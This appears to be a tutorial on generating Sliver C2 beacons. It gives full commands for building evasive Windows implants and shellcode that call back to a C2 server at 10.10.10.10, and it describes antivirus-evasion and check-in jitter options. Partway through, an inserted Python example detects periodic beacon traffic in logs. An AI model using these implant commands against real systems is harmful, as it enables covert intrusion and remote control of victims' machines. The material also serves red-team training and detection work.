Beacons
Beacons are essential components in a Command and Control (C2) framework, serving as the means through which implants running on compromised endpoints communicate with the C2 server. Beacons send periodic "check-ins" to the C2 server, reporting their status and waiting for further instructions.
Setting Up Beacons
To generate a beacon in Sliver, you use the generate beacon command. This command allows you to create a binary that can be deployed on target machines to establish a communication channel with the C2 server through listeners.
- Basic Beacon Generation (HTTP):
generate beacon --name my_beacon --arch amd64 --os windows --format exe --http http://10.10.10.10:9000
This basic command sets up a beacon with the following parameters:
--name: Specifies the name of the agent.
--arch: Specifies the CPU architecture.
--os: Specifies the operating system.
--format: Specifies the output format.
--http: Sets the HTTP connection string for communication.
Key Configuration Options
1. Beacon Interval and Jitter:
Beacon Interval (--days, --hours, --minutes, --seconds): Configures how frequently the beacon checks in with the C2 server. Adjusting these intervals helps evade detection by security tools.
Jitter (--jitter): Adds randomness to the beacon interval to avoid creating predictable patterns that could be detected by security monitoring.
2. Evasion Techniques:
Evasion Features (--evasion): Enables various evasion techniques to bypass security measures such as antivirus solutions.
Disable Shikata Ga Nai (--disable-sgn): Disables the Shikata Ga Nai shellcode encoder, which might be flagged by some security solutions.
3. Limitations and Constraints:
Hostname (--limit-hostname): Only execute on a specific hostname.
Username (--limit-username): Only execute if a specific user is logged in.
File Existence (--limit-fileexists): Only execute if a certain file exists on the filesystem.
Domain Joined (--limit-domainjoined): Only execute if the machine is domain-joined.
Datetime (--limit-datetime): Restrict execution to before a specific date and time.
4. Error Handling and Reconnect:
Max Errors (--max-errors): Defines the maximum number of connection errors before the beacon gives up.
Reconnect (--reconnect): Sets the interval at which the beacon attempts to reconnect to the C2 server if the connection is lost.
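Seen from the monitoring side, the Beacon Interval and Jitter settings above determine how regular an implant's check-ins look in proxy or flow logs. The following Python code is an added example, not part of the original page or of Sliver: it groups constructed log lines by source and destination and flags flows whose inter-request intervals cluster tightly around their median. The log format, the host names ws-014 and ws-022, the address 203.0.113.7 and both thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median

def parse(lines):
    """Group request times by (source, destination); line format: 'ISO-time src dst'."""
    flows = defaultdict(list)
    for line in lines:
        parts = line.split()
        if len(parts) == 3:  # skip lines with the wrong field count
            flows[(parts[1], parts[2])].append(datetime.fromisoformat(parts[0]))
    return flows

def score(times):
    """Return (median interval in seconds, MAD / median), or None if not computable."""
    times = sorted(times)
    deltas = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if not deltas or median(deltas) <= 0:
        return None
    med = median(deltas)
    mad = median(abs(d - med) for d in deltas)  # robust to a few missed check-ins
    return med, mad / med

def find_periodic(lines, min_events=8, max_spread=0.35):
    """Flag flows with enough events and a tight interval spread (assumed thresholds)."""
    hits = {}
    for flow, times in parse(lines).items():
        result = score(times) if len(times) >= min_events else None
        if result and result[1] <= max_spread:
            hits[flow] = result
    return hits

def sample_lines():
    """Constructed sample: one jittered 60-90 s check-in flow, one irregular browsing flow."""
    base = datetime(2024, 5, 1, 9, 0, 0)
    beacon = [0, 72, 133, 221, 300, 365, 455, 525, 608, 674]
    browse = [0, 2, 3, 40, 41, 300, 305, 306, 900, 1500]
    stamp = lambda s: (base + timedelta(seconds=s)).isoformat()
    return ([f"{stamp(s)} ws-014 10.10.10.10:9000" for s in beacon] +
            [f"{stamp(s)} ws-022 203.0.113.7:443" for s in browse])

if __name__ == "__main__":
    for (src, dst), (med, spread) in find_periodic(sample_lines()).items():
        print(f"{src} -> {dst}: median interval {med:.0f}s, spread {spread:.2f}")
```

Jitter that is large relative to the interval raises the spread, so max_spread and min_events need tuning against a baseline of legitimate periodic traffic such as update checks and telemetry.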
Examples
HTTP / Evasion
generate beacon --name my_beacon --arch amd64 --os windows --format exe --http http://10.10.10.10:9000 --evasion --save beacon_https.exe
Shellcode / HTTPS / Evasion
generate beacon -b https://10.10.10.10:9000 --evasion --format shellcode --name beacon_https --save beacon_https.bin